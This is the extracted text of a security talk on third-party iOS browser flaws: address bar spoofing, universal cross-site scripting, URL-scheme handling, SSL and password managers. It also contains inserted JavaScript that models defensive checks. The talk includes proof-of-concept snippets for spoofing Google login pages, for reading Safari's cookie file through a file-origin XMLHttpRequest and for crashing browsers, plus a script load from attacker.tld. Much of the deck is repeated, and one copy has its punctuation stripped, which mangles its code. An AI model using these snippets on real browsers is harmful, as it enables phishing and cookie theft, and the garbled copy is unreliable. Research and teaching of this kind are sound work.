bull httpscodegooglecompchromiumissuesdetailid=348640
bull httpblogsoperacommobile201405opera-coast-updated-3-02
bull httpwwwf-securecomenweblabs_globalfsc-2014-4
Mobile Browsers Security iOS
References
bull httpbrowser-shreddersblogspotcom
bull httpsiosbrowsr-testscom
Mobile Browsers Security iOS
Questions
Mobile Browsers Security iOS
lukaszpilorzrunicpl pawelwylecialgmailcom
Twitter runicpl h0wlu
Thank you
Mobile Browsers Security iOS
Untracked Content
Replace window content with untracked content
documentwrite andor data URIs are usually good candidates
bull w = windowopen(lsquohttpsaccountsgooglecomrsquo) setTimeout(function()wdocumentwrite() hellip)
Address Bar Spoofing
Untracked Content
bull CVE-2013-5152 Mobile Safari Address Bar Spoofingreported in iOS 511 fixed in iOS 7
Address Bar Spoofing
Address Bar Spoofing Init amp Interrupt
Address Bar Spoofing
Init amp InterruptInitialise window with target URL replace with phishing content before it loads
bull w = windowopen(lsquohttpsaccountsgooglecomrsquo) wdocumentwrite(hellip)
Optionally fall-back to native windowopen
bull delete windowopenw = windowopen(lsquohttpsaccountsgooglecomrsquo) wdocumentwrite(hellip)
Address Bar Spoofing
Address Bar Spoofing
Init amp Interruptbull CVE-2013-6895 Kaspersky Safe Browser
bull CVE-2013-6898 F-Secure Safe Browser
bull CVE-2013-6897 Dolphin Browser
bull hellip and 45 of tested browsers
bull Special guest star Google Chrome for Android CVE-2013-6642
Address Bar Spoofing
Bug Bounty-)
Address Bar Spoofing Failed Navigation
Address Bar Spoofing
Failed NavigationIncorrect URL often remains in address bar after navigation errors
bull DNS NXDOMAIN - host not found (httpslogintargettld)
bull TCP port closed (httpswwwtargettld448)
bull SSL errors (httpstargettld)
bull Display phishing page then redirect to ldquoincorrectrdquo URL
bull Mobile Safari before iOS 7 windowfocus() or windowopen()close() allowed suppressing error alerts
Address Bar Spoofing
Address Bar Spoofing Loading loop
Address Bar Spoofing
Loading loopbull HTTP request timeout in iOS browsers is usually
between 1 and 10 minutes
bull Address bar in Mobile Safari and many other iOS browsers is updated on navigation attempt even before an actual connection is made
bull Now we only need to find a target with filtered port 443
bull Or any filtered port because Mobile Safari shows only the hostname part of the URL
Address Bar Spoofing
Loading loop
bull documentwrite(Phishing page here) location = httpsaccountsgooglecom8443setInterval(function() location=httpsaccountsgooglecom8443 hellip)
Address Bar Spoofing
Address Bar Spoofing
Phishing page
Title bar
Address Bar Spoofing
lttitlegthttpswwwapplecomlttitlegt
Address bar tipsbull Display the URL that is currently loaded within
UIWebView not the one you think will be there
bull UIWebViewDelegate Update address bar on each event including webViewdidFailLoadWithError
bull Displaying SSL lock makes sense if there was an actual successful and valid SSL connection Spoofing https URL seems easy donrsquot make it worse by automatically adding SSL lock
bull iOS8 KVO-compliant WKWebViewURL property
Address Bar Spoofing
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
UXSS UniversalCross-Site Scripting
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
XSS enables attackers to inject client-side script into web pages viewed by other users
bypassing same-origin policy
In UXSS the attacker exploits vulnerability in the browser not in the website
(~ httpenwikipediaorgwikiCross-site_scripting)
Famous after PDF UXSS in 2007
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
bull CVE-2013-6893 UXSS in Mercury Browser for iOS
bull CVE-2013-7197 UXSS in YandexBrowser for iOS
bull CVE-2012-2899 UXSS in Google Chrome for iOS
bull hellip
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
UXSS Universal Cross-Site Scripting
CVE-2013-6893UXSS in Mercury Browser
UXSS Universal Cross-Site Scripting
CVE-2013-6893 Mercury UXSS
w = windowopen(lsquoaboutblankrsquo)
mbexec$(WINDOW_ID)[ commandwindowopen target1234 ldquourlaboutblank ]
Mathrandom()
UXSS Universal Cross-Site Scripting
[webView loadRequest hellip ldquoaboutblankrdquo hellip]
cross-frame forgery
CVE-2013-6893 Mercury UXSS
wdocumentwrite(lsquoHirsquo)
mbexec$(WINDOW_ID)[ ldquocommandwindowdocumentwrite target1234 ldquohtmlrdquoHi ]
UXSS Universal Cross-Site Scripting
[webView stringByEvaluatingJavaScriptFromString ldquodocumentwrite(lsquoHirsquo)rdquo]
CVE-2013-6893 Mercury UXSS
Mercury Browser for iOS does not implement same-origin policy restrictions for cross-tab calls Any at all
w = windowopen(lsquohttpsaccountsgooglecom) wdocumentwrite(lsquoltscript src=hellipgtltscriptgtrsquo) hellipand it just works in accountsgooglecom
UXSS Universal Cross-Site Scripting
UXSS Universal Cross-Site Scripting
CVE-2013-7197UXSS in YandexBrowser
UXSS Universal Cross-Site Scripting
CVE-2013-7197 Yandex UXSS
bull Same-origin check implemented on windowopen()
bull Not rechecked on windowdocumentwrite()
bull Redirect child window after windowopen()
UXSS
UXSS Universal Cross-Site Scripting
Bug Bounty-)
CVE-2012-2899UXSS in Google Chrome
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull w = windowopen(locationhref)wdocumentwrite(lsquoHirsquo)
bull [webView loadHTMLStringldquoHirdquo baseURLhref]
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull w = windowopen(lsquoaboutblankrsquo)wdocumentwrite(hellip)
bull aboutblank is kind of ldquono URLrdquo right
bull [webView loadHTMLStringldquohelliprdquo baseURLnil]
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull For baseURL = nilUIWebView loads applewebdata origin Same as file - no same-origin policy access to any web origin and local files
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSSbull w = windowopen(lsquoaboutblankrsquo)
wdocumentwrite( lsquoltscriptgtdocumentwrite(locationhref)ltscriptgtrsquo )
bull applewebdata origin
bull UXSS + local file access (application sandboxjailbreak)
UXSS Universal Cross-Site Scripting
Bug Bounty-)
Safe cross-tab documentwrite
bull w = windowopen(locationhref) wdocumentwrite(lsquoHirsquo)
bull [webView loadHTMLStringldquoHirdquo baseURL [NSURL hellipldquoaboutblankrdquo]
UXSS Universal Cross-Site Scripting
Safe cross-tab documentwrite
bull iOS8 use WKWebViewUIDelegate webViewcreateWebViewWithConfigurationforNavigationActionwindowFeatures
UXSS Universal Cross-Site Scripting
Other potential paths to applewebdata or file originbull baseURL
[NSURL URLWithStringldquohttpexamplecomrdquo] mdashgt nil
bull CFURLCreateWithString(kCFAllocatorDefault CFSTR(ldquohttpexamplecom) NULL) mdashgt NULL
bull Downloads opened directly from file
UXSS Universal Cross-Site Scripting
Content-Disposition attachmentbull displayed in the origin of hosting site (iOS lt 5)
CVE-2011-3426 Christian Matthies Yoshinori Oota
bull isolated attachment origin (iOS 5 +)
bull documentlocationhref
bull documentreferrer
bull w=windowopen(lsquohttpsrsquo+locationhostname) wdocumentwrite(lsquocustom SOP implementationrsquo)
UXSS Universal Cross-Site Scripting
Content-Typebull textplain
HTML (iOS lt 7) CVE-2013-5151 Ben Toews
bull applicationoctet-stream HTML
bull applicationother filenamehtml
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgta = documentlocationhrefsplit() if(a[0]===file) path = lsquofile+a[3]++a[4]++a[5]++a[6]+rsquo+a[7] path = path+LibraryCookiesCookiesbinarycookies x = new XMLHttpRequest() xopen(GET path false) xsend() alert(xresponseText) ltscriptgt
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgt x = new XMLHttpRequest() xopen(lsquoGET lsquohttpsyourintranet false) xsend() alert(xresponseText)ltscriptgt
UXSS Universal Cross-Site Scripting
ChallengeHijack password autofill
UXSS Universal Cross-Site Scripting
Opening local HTML files safely
bull Open as textplain
bull Content-Security-Policy header HTML5 sandbox
bull baseURL = aboutblank
bull iOS8 WKWebViewconfigurationpreferencesjavaScriptEnabled = false
UXSS Universal Cross-Site Scripting
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
Popups amp URL handling
Popups amp URL handling
bull Browsers rewriting href attributes for target=_blank can be usually tricked into believing navigation was initiated by user
bull ltiframe src=ldquogooglechromeexamplecomrdquogtltiframe src=ldquomercexamplecomrdquogtetc bypass all popup blockers anywayhellip
Popup blockers
Popups amp URL handling
URI schemes (diagram)
  Native (WebKit)
  Application (bolted-on)
    Bridge (internal), e.g.
      scheme://download/https://secure.tld/victim/data
      scheme://download/http://attacker.tld/README.html
      scheme://add-filter?url=
    Registered (external)
CFURL Null Pointer Dereference
• Any CFURL function that gets NULL as an argument will cause a NULL pointer dereference; CFURLCreateWithString returns NULL for a string it cannot parse, and code that passes that result on without a check crashes the browser
• Tested with percent encoding: http://%, http://%5, http://%5c etc.
• Example, Opera Coast: <script>document.location = 'http://%5c'</script>

Opera Coast:
Program received signal EXC_BAD_ACCESS, Could not access memory.
Reason: KERN_INVALID_ADDRESS at address: 0x00000000
0x2f3e0d76 in CFURLCopyPath ()
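The three URL-handling slides describe one decision point: what a UIWebView-based browser does in webView:shouldStartLoadWithRequest:navigationType: when the request is not a plain web navigation. The block below is an added example, not code from the talk or from any browser named in it; it models that decision in JavaScript. The bridge scheme name "mybrowser", the request object shape and the sample requests are constructed for this example.

```javascript
// Added example, not from the slides: a navigation-policy model for the
// decision a UIWebView-based browser takes in
// webView:shouldStartLoadWithRequest:navigationType:. The bridge scheme name
// "mybrowser", the request shape and the sample requests are constructed.

const BRIDGE_SCHEME = 'mybrowser:';               // internal JavaScript <-> native bridge (assumed name)
const WEB_SCHEMES = new Set(['http:', 'https:']);
const LINK_CLICKED = 'linkClicked';               // stands for UIWebViewNavigationTypeLinkClicked

// Parse first and fail closed. The CoreFoundation equivalent is checking that
// CFURLCreateWithString() / +[NSURL URLWithString:] did not return NULL/nil
// before passing the result to any other CFURL function.
function parseURL(str) {
  try { return new URL(str); } catch (e) { return null; }
}

// request = { url, fromWebContent, isMainFrame, navigationType }
function navigationDecision(request) {
  const url = parseURL(request.url);
  if (url === null) return { allow: false, reason: 'unparseable URL' };

  if (WEB_SCHEMES.has(url.protocol)) return { allow: true, reason: 'web navigation' };

  if (url.protocol === BRIDGE_SCHEME) {
    // Bridge commands (download, add-filter, ...) are issued by the app's own
    // UI code. Page content must not be able to drive them, e.g. through
    // <iframe src="mybrowser://download/http://attacker.tld/README.html">.
    return request.fromWebContent
      ? { allow: false, reason: 'bridge scheme from web content' }
      : { allow: true, reason: 'bridge command from app UI' };
  }

  // Anything else is a scheme registered by another app (googlechrome:,
  // merc:, ...). Handing it off bypasses every popup blocker, so require a
  // real link click in the main frame; subframes and script-driven
  // navigations are dropped.
  if (request.isMainFrame && request.navigationType === LINK_CLICKED) {
    return { allow: true, reason: 'user-initiated external scheme' };
  }
  return { allow: false, reason: 'external scheme without user gesture' };
}
```

The ordering matters: parsing comes before any classification, so the malformed percent-encodings from the CFURL slide are rejected at the top rather than reaching a native function as NULL, and the bridge check keys on the parsed scheme, not on a string prefix.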
• Special guest star: Safari on OS X Mavericks before Security Update 2014-002 (CVE-2014-1315), a format string issue in URL handling, triggered here with an unregistered scheme:
  <iframe src="lets-try-format-string:%p%p%p%p…">
SSL & password managers
SSL
• By default, invalid certificates for UIWebView https requests are rejected without user interaction
• This can be changed (e.g. to allow a user to accept a self-signed certificate)
• 14 of the tested browsers: self-signed SSL certificates are silently accepted
• In some cases the validation is done for the main domain only, not for the other domains the page loads from (e.g. Opera Coast < 3.02)
Password managers
• JavaScript runs with the privileges of the top frame → passwords are not filled for subframes
• Usually possible to force saving a password for another domain (with or without user interaction)
• Password filling checks the domain, but not always the URL scheme (https vs http)
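The three password-manager points are the fill and save decisions of a bolted-on password manager. The block below is an added example, not code from the talk or from any of the tested browsers; it shows both decisions made on full origins (scheme, host and port) rather than on the domain alone. The saved-entry and page-context shapes and all sample values are constructed for this example.

```javascript
// Added example, not from the slides: the fill and save decisions of a
// browser's password manager. The savedEntry/page/form shapes and the sample
// values are constructed for this example.

// Origin = scheme://host[:port]; "bank.tld" alone is not a key.
function originOf(href) { return new URL(href).origin; }

// savedEntry = { origin, username, password }
// page = { topURL, frameURL, isTopFrame }
function shouldAutofill(savedEntry, page) {
  // Fill in the top frame only: the filling script runs with top-frame
  // privileges, and a login form inside a third-party iframe is not the page
  // the user is looking at.
  if (!page.isTopFrame) return { fill: false, reason: 'login form in a subframe' };
  // Compare full origins, so a credential saved on https://bank.tld is never
  // offered to http://bank.tld (an active network attacker) or to bank.tld:8443.
  if (originOf(page.frameURL) !== savedEntry.origin) return { fill: false, reason: 'origin mismatch' };
  return { fill: true, reason: 'same origin, top frame' };
}

// A credential is saved for the origin of the document that contained the
// form, taken from the web view's actually loaded URL, never from the form's
// action, the address bar string or anything else the page supplies, and
// only on a submit the user performed. Returns the entry to store, or null.
function captureCredential(page, form, submittedByUser) {
  if (!submittedByUser || !page.isTopFrame) return null;
  return { origin: originOf(page.topURL), username: form.username, password: form.password };
}
```

With this keying, a phishing page at https://attacker.tld that posts to bank.tld can only ever create an entry for attacker.tld, and a saved https entry stays unavailable to a downgraded http version of the same host.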
Summary
• UIWebViews should be replaced with iOS 8 WKWebViews in browser applications
• Most third-party iOS browsers are experimental or side projects built with less attention to detail
• Mobile device management and other enterprise solutions often include a browser application. Did you test it?
References
• https://developer.apple.com/library/ios/documentation/AppleApplications/Reference/SafariWebContent/
• https://developer.apple.com/library/ios/documentation/UIKit/Reference/UIWebView_Class/Reference/Reference.html
• https://developer.apple.com/library/ios/documentation/UIKit/Reference/UIWebViewDelegate_Protocol/Reference/Reference.html
• https://developer.apple.com/library/mac/documentation/CoreFoundation/Reference/CFURLRef/Reference/reference.html
• https://developer.apple.com/library/prerelease/ios/documentation/WebKit/Reference/WKWebView_Ref/index.html
• https://code.google.com/p/browsersec/
• http://www.w3.org/TR/CSP/
• http://www.slideshare.net/iphonepentest/ios-application-insecurity
• https://labs.mwrinfosecurity.com/blog/2012/04/16/adventures-with-ios-uiwebviews/
• http://www.shmoo.com/idn/
• http://blog.chromium.org/2008/12/security-in-depth-local-web-pages.html
• http://research.microsoft.com/pubs/73101/guilogicsecurity.pdf
• http://gs.statcounter.com/
• https://code.google.com/p/chromium/issues/detail?id=146760
• https://code.google.com/p/chromium/issues/detail?id=147625
• https://code.google.com/p/chromium/issues/detail?id=324969
• https://code.google.com/p/chromium/issues/detail?id=326118
• https://code.google.com/p/chromium/issues/detail?id=326125
• https://code.google.com/p/chromium/issues/detail?id=348640
• http://blogs.opera.com/mobile/2014/05/opera-coast-updated-3-02/
• http://www.f-secure.com/en/web/labs_global/fsc-2014-4
• http://browser-shredders.blogspot.com/
• https://ios.browsr-tests.com/

Questions?

lukasz.pilorz@runic.pl, pawel.wylecial@gmail.com
Twitter: @runicpl, @h0wlu

Thank you
Address Bar Spoofing
• CVE-2013-5152, Mobile Safari Address Bar Spoofing: reported in iOS 5.1.1, fixed in iOS 7
Address Bar Spoofing: Init & Interrupt
Initialise a window with the target URL, then replace it with phishing content before the target loads:
  w = window.open('https://accounts.google.com'); w.document.write(…);
Optionally fall back to the native window.open (if the browser has overridden it in JavaScript):
  delete window.open; w = window.open('https://accounts.google.com'); w.document.write(…);
Init & Interrupt, affected browsers
• CVE-2013-6895, Kaspersky Safe Browser
• CVE-2013-6898, F-Secure Safe Browser
• CVE-2013-6897, Dolphin Browser
• … and 45 of the tested browsers
• Special guest star: Google Chrome for Android, CVE-2013-6642
Bug Bounty :-)
Address Bar Spoofing: Failed Navigation
The incorrect URL often remains in the address bar after a navigation error:
• DNS NXDOMAIN, host not found (https://login.target.tld)
• TCP port closed (https://www.target.tld:448)
• SSL errors (https://target.tld)
• Display the phishing page, then redirect to the "incorrect" URL
• Mobile Safari before iOS 7: window.focus() or window.open().close() allowed suppressing the error alerts
Address Bar Spoofing: Loading loop
• The HTTP request timeout in iOS browsers is usually between 1 and 10 minutes
• The address bar in Mobile Safari and many other iOS browsers is updated on the navigation attempt, even before an actual connection is made
• Now we only need to find a target with a filtered port 443 (packets dropped rather than rejected, so the connection attempt hangs until the timeout)
• Or any filtered port, because Mobile Safari shows only the hostname part of the URL

  document.write('Phishing page here');
  location = 'https://accounts.google.com:8443/';
  setInterval(function() { location = 'https://accounts.google.com:8443/'; … });
Address Bar Spoofing: phishing page in the title bar
  <title>https://www.apple.com</title>
Address bar tips
• Display the URL that is currently loaded within the UIWebView, not the one you think will be there
• UIWebViewDelegate: update the address bar on each event, including webView:didFailLoadWithError:
• Displaying an SSL lock makes sense only if there was an actual, successful and valid SSL connection. Spoofing an https URL seems easy; don't make it worse by automatically adding the SSL lock
• iOS 8: KVO-compliant WKWebView.URL property
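The difference the tips make can be shown by feeding the same delegate events to two address-bar implementations. The block below is an added example, not code from the talk or from any browser named in it: NaiveAddressBar behaves like the spoofable browsers (requested URL shown at once, lock derived from the URL string, failures ignored), AddressBar follows the tips. The event objects mirror the UIWebViewDelegate callbacks; the two attacker sequences are constructed from the Loading loop and Failed Navigation slides.

```javascript
// Added example, not from the slides: two address-bar implementations fed the
// same UIWebViewDelegate-style event sequences. Event names, event object
// shapes and the attacker sequences are constructed for this example.

// Spoofable: trusts the requested URL as soon as the load is attempted, derives
// the lock from the URL string, and never reacts to a failed load.
class NaiveAddressBar {
  constructor() { this.text = 'about:blank'; this.lock = false; }
  shouldStartLoad(url) { this.text = url; this.lock = url.startsWith('https:'); }
  didFinishLoad(url) { this.text = url; }
  didFailLoad() { /* shows an error alert; the bar keeps the requested URL */ }
  display() { return { text: this.text, lock: this.lock, loading: false }; }
}

// Shows only what the web view has actually loaded (webView.request.mainDocumentURL);
// the lock needs a finished https load with a valid certificate; a failed load
// reverts to the page that is still displayed. A pending navigation is
// surfaced as a loading indicator, not as the URL.
class AddressBar {
  constructor() { this.loadedURL = 'about:blank'; this.tlsValid = false; this.pending = null; }
  shouldStartLoad(url) { this.pending = url; }
  didFinishLoad(url, tlsValid) { this.loadedURL = url; this.tlsValid = tlsValid === true; this.pending = null; }
  didFailLoad() { this.pending = null; }
  display() {
    return { text: this.loadedURL,
             lock: this.loadedURL.startsWith('https:') && this.tlsValid,
             loading: this.pending !== null };
  }
}

// Feed a delegate-event sequence to a bar and return what it would show.
function runSequence(bar, events) {
  for (const e of events) {
    if (e.event === 'shouldStartLoad') bar.shouldStartLoad(e.url);
    else if (e.event === 'didFinishLoad') bar.didFinishLoad(e.url, e.tlsValid);
    else if (e.event === 'didFailLoad') bar.didFailLoad(e.url, e.error);
  }
  return bar.display();
}

// Loading loop: phishing page loaded, then a navigation to a filtered port that never connects.
const LOADING_LOOP = [
  { event: 'didFinishLoad', url: 'http://attacker.tld/phish.html', tlsValid: false },
  { event: 'shouldStartLoad', url: 'https://accounts.google.com:8443/' },
];
// Failed navigation: phishing page loaded, then a redirect to a host that does not resolve.
const FAILED_NAVIGATION = [
  { event: 'didFinishLoad', url: 'http://attacker.tld/phish.html', tlsValid: false },
  { event: 'shouldStartLoad', url: 'https://login.target.tld/' },
  { event: 'didFailLoad', url: 'https://login.target.tld/', error: 'NXDOMAIN' },
];
```

Against both sequences the naive bar ends up showing the target's https URL with a lock over attacker content; the other bar keeps showing http://attacker.tld/phish.html, with a spinner in the first case and nothing in the second.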
UXSS: Universal Cross-Site Scripting
XSS enables attackers to inject client-side script into web pages viewed by other users, bypassing the same-origin policy. In UXSS the attacker exploits a vulnerability in the browser, not in the website (after http://en.wikipedia.org/wiki/Cross-site_scripting). Famous after the PDF UXSS in 2007.
• CVE-2013-6893, UXSS in Mercury Browser for iOS
• CVE-2013-7197, UXSS in Yandex.Browser for iOS
• CVE-2012-2899, UXSS in Google Chrome for iOS
• …
CVE-2013-6893: UXSS in Mercury Browser
Mercury implements window.open() and document.write() for its tabs over a JavaScript-to-Objective-C bridge; the target is identified only by a number taken from Math.random() (cross-frame forgery):

  w = window.open('about:blank');
    → mbexec$(WINDOW_ID)[{ "command": "window.open", "target": 1234, "url": "about:blank" }]
    → [webView loadRequest: … "about:blank" …]

  w.document.write('Hi');
    → mbexec$(WINDOW_ID)[{ "command": "window.document.write", "target": 1234, "html": "Hi" }]
    → [webView stringByEvaluatingJavaScriptFromString:@"document.write('Hi')"]

Mercury Browser for iOS does not implement same-origin policy restrictions for cross-tab calls. Any at all.
  w = window.open('https://accounts.google.com'); w.document.write('<script src=…></script>');
…and it just works in accounts.google.com.
CVE-2013-7197: UXSS in Yandex.Browser
• Same-origin check implemented on window.open()
• Not rechecked on window.document.write()
• Redirect the child window after window.open() → UXSS
Bug Bounty :-)
CVE-2012-2899: UXSS in Google Chrome for iOS
• w = window.open(location.href); w.document.write('Hi');
  → [webView loadHTMLString:@"Hi" baseURL:href]
• w = window.open('about:blank'); w.document.write(…);
  about:blank is kind of "no URL", right?
  → [webView loadHTMLString:@"…" baseURL:nil]
• For baseURL = nil, UIWebView loads the content in the applewebdata:// origin. Same as file://: no same-origin policy, access to any web origin and to local files
• w = window.open('about:blank'); w.document.write('<script>document.write(location.href)</script>');
  → shows the applewebdata:// origin
• UXSS + local file access (application sandbox / jailbreak)
Bug Bounty :-)
Safe cross-tab document.write
• w = window.open(location.href); w.document.write('Hi');
  → [webView loadHTMLString:@"Hi" baseURL:[NSURL … @"about:blank"]]
• iOS 8: use the WKWebView UIDelegate method webView:createWebViewWithConfiguration:forNavigationAction:windowFeatures:
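The three UXSS cases above are the same bridge with the same-origin check in three different places: absent (Mercury), taken once at window.open() (Yandex.Browser), or taken against the target's current origin at write time. The block below is an added example, not code from the talk or from any of the browsers named; it models such a bridge in JavaScript so the three placements can be compared on the redirect-after-open sequence. The Browser class, tab records, tab ids and sample origins are constructed for this example.

```javascript
// Added example, not from the slides: a model of the JavaScript-to-native tab
// bridge that third-party iOS browsers used for window.open() and
// document.write() across UIWebViews, with the same-origin check placed in
// three different ways. Browser, tab records and sample origins are constructed.

// Origin = scheme://host[:port]. about:blank has no origin of its own and has
// to inherit the opener's; it must never be mapped to a nil baseURL, which
// UIWebView turns into the unrestricted applewebdata:// origin.
function originOf(href) {
  const u = new URL(href);
  return u.protocol === 'about:' ? null : u.origin;
}

// mode: 'none'  - no check at all (the CVE-2013-6893 case)
//       'open'  - checked once in window.open(), trusted afterwards (the CVE-2013-7197 case)
//       'write' - re-checked against the target's current origin on every write
class Browser {
  constructor(mode) { this.mode = mode; this.tabs = new Map(); this.nextId = 1; }

  createTab(href) {
    const id = this.nextId++;
    this.tabs.set(id, { id, href, origin: originOf(href), html: '', trusted: false });
    return id;
  }

  // w = window.open(url) issued from tab `openerId`.
  open(openerId, url) {
    const opener = this.tabs.get(openerId);
    const id = this.createTab(url);
    const tab = this.tabs.get(id);
    if (tab.origin === null) tab.origin = opener.origin;   // about:blank inherits the opener
    tab.trusted = tab.origin === opener.origin;             // the one-time check
    return id;
  }

  // The child navigates (or is redirected) after window.open(). Its origin
  // changes, so a verdict taken at open() no longer says anything about it.
  navigate(tabId, url) {
    const tab = this.tabs.get(tabId);
    tab.href = url;
    const o = originOf(url);
    if (o !== null) tab.origin = o;
  }

  // w.document.write(html) issued from `openerId` into `targetId`.
  // Returns true if the bridge executed it in the target web view.
  documentWrite(openerId, targetId, html) {
    const opener = this.tabs.get(openerId), target = this.tabs.get(targetId);
    if (!opener || !target) return false;
    let allowed;
    if (this.mode === 'none') allowed = true;
    else if (this.mode === 'open') allowed = target.trusted;
    else allowed = opener.origin === target.origin;
    if (!allowed) return false;
    target.html += html;   // [webView loadHTMLString:html baseURL:<a URL of target.origin, never nil>]
    return true;
  }
}

// The redirect-after-open sequence from the Yandex.Browser slide, run against
// a bridge in the given mode. Returns whether the foreign write went through.
function uxssAttempt(mode) {
  const b = new Browser(mode);
  const attacker = b.createTab('https://attacker.tld/');
  const child = b.open(attacker, 'about:blank');      // same origin as the opener: passes any check
  b.navigate(child, 'https://accounts.google.com/');  // now a foreign origin
  return b.documentWrite(attacker, child, '<script src="https://attacker.tld/x.js"></script>');
}
```

Only the 'write' mode refuses the write after the redirect; 'open' accepts it because the child was same-origin when the check ran, which is the redirect bypass described on the Yandex.Browser slide, and 'none' accepts everything. The model keeps the about:blank popup in the opener's origin, so a legitimate same-origin document.write into a fresh popup still works in every mode.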
Other potential paths to the applewebdata:// or file:// origin
• baseURL built with [NSURL URLWithString:] → nil whenever the string (here a variant of "http://example.com" with an illegal character) cannot be parsed as a URL
• CFURLCreateWithString(kCFAllocatorDefault, CFSTR("http://example.com"), NULL) → NULL in the same situation
• Downloads opened directly from file://
Content-Disposition attachmentbull displayed in the origin of hosting site (iOS lt 5)
CVE-2011-3426 Christian Matthies Yoshinori Oota
bull isolated attachment origin (iOS 5 +)
bull documentlocationhref
bull documentreferrer
bull w=windowopen(lsquohttpsrsquo+locationhostname) wdocumentwrite(lsquocustom SOP implementationrsquo)
UXSS Universal Cross-Site Scripting
Content-Typebull textplain
HTML (iOS lt 7) CVE-2013-5151 Ben Toews
bull applicationoctet-stream HTML
bull applicationother filenamehtml
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgta = documentlocationhrefsplit() if(a[0]===file) path = lsquofile+a[3]++a[4]++a[5]++a[6]+rsquo+a[7] path = path+LibraryCookiesCookiesbinarycookies x = new XMLHttpRequest() xopen(GET path false) xsend() alert(xresponseText) ltscriptgt
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgt x = new XMLHttpRequest() xopen(lsquoGET lsquohttpsyourintranet false) xsend() alert(xresponseText)ltscriptgt
UXSS Universal Cross-Site Scripting
ChallengeHijack password autofill
UXSS Universal Cross-Site Scripting
Opening local HTML files safely
bull Open as textplain
bull Content-Security-Policy header HTML5 sandbox
bull baseURL = aboutblank
bull iOS8 WKWebViewconfigurationpreferencesjavaScriptEnabled = false
UXSS Universal Cross-Site Scripting
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
Popups amp URL handling
Popups amp URL handling
bull Browsers rewriting href attributes for target=_blank can be usually tricked into believing navigation was initiated by user
bull ltiframe src=ldquogooglechromeexamplecomrdquogtltiframe src=ldquomercexamplecomrdquogtetc bypass all popup blockers anywayhellip
Popup blockers
Popups amp URL handling
Application(bolted-on)
Native (WebKit)
bull schemedownloadhttpssecuretldvictimdata schemedownloadhttpattackertldREADMEhtml
bull schemeadd-filterurl=
Bridge (internal)
URI schemes
Popups amp URL handling
Registered(external)
CFURL Null Pointer Dereferencebull Any CFURL function that gets NULL as an argument
will cause Null Pointer Dereference
bull Tested with percent encodinghttp http5 http5c etc
bull Example Opera Coast ltscriptgtdocumentlocation = lsquohttp5crsquoltscriptgt
Popups amp URL handling
Opera Coast
Program received signal EXC_BAD_ACCESS Could not access memory
Reason KERN_INVALID_ADDRESS at address 0x00000000
0x2f3e0d76 in CFURLCopyPath()
Popups amp URL handling
bull Special guest star Safari on OS X Mavericksbefore Security Update 2014-02 (CVE-2014-1315)
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
SSLbull By default invalid certificates for iOS UIWebView
https requests are rejected without user interaction
bull This can be changed (eg allowing a user to accept self-signed cert)
bull 14 of tested browsersself-signed SSL certificates are silently accepted
bull In some cases the validation is done for main domain only (eg Opera Coast lt 302)
SSL amp password managers
SSL amp password managers
Password managers
bull JavaScript with privileges of top frame mdashgt passwords not filled for subframes
bull Usually possible to force saving password for another domain (withwithout user interaction)
bull Password filling checks for domain but not always for URL scheme (https vs http)
SSL amp password managers
SSL amp password managers
Summary
bull UIWebViews should be replaced with iOS8 WKWebViews in browser applications
bull Most 3rd party iOS browsers are experimental or side projects built with less attention to detail
bull Mobile device management and other enterprise solutions often include a browser application Did you test it
Mobile Browsers Security iOS
Referencesbull httpsdeveloperapplecomlibraryiosdocumentation
AppleApplicationsReferenceSafariWebContent
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebView_ClassReferenceReferencehtml
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebViewDelegate_ProtocolReferenceReferencehtml
bull httpsdeveloperapplecomlibrarymacdocumentationcorefoundationReferenceCFURLRefReferencereferencehtml
bull httpsdeveloperapplecomlibraryprereleaseiosdocumentationWebKitReferenceWKWebView_Refindexhtml
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompbrowsersec
bull httpwwww3orgTRCSP
bull httpwwwslidesharenetiphonepentestios-application-insecurity
bull httpslabsmwrinfosecuritycomblog20120416adventures-with-ios-uiwebviews
bull httpwwwshmoocomidn
bull httpblogchromiumorg200812security-in-depth-local-web-pageshtml
bull httpresearchmicrosoftcompubs73101guilogicsecuritypdf
bull httpgsstatcountercom
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompchromiumissuesdetailid=146760
bull httpscodegooglecompchromiumissuesdetailid=147625
bull httpscodegooglecompchromiumissuesdetailid=324969
bull httpscodegooglecompchromiumissuesdetailid=326118
bull httpscodegooglecompchromiumissuesdetailid=326125
bull httpscodegooglecompchromiumissuesdetailid=348640
bull httpblogsoperacommobile201405opera-coast-updated-3-02
bull httpwwwf-securecomenweblabs_globalfsc-2014-4
Mobile Browsers Security iOS
References
bull httpbrowser-shreddersblogspotcom
bull httpsiosbrowsr-testscom
Mobile Browsers Security iOS
Questions
Mobile Browsers Security iOS
lukaszpilorzrunicpl pawelwylecialgmailcom
Twitter runicpl h0wlu
Thank you
